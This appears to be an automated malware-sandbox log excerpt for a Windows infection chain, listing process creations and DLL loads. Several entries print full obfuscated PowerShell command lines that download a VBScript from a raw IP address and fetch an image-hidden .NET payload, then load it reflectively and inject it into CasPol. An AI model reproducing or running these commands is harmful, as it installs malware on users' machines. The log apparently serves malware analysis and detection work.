                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE59.tmp" "c:\Users\user\AppData\Local\Temp\xduntapu\CSC441F3FFBBAD0418BBB746B4643CA251D.TMP"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE59.tmp" "c:\Users\user\AppData\Local\Temp\xduntapu\CSC441F3FFBBAD0418BBB746B4643CA251D.TMP"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblemJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
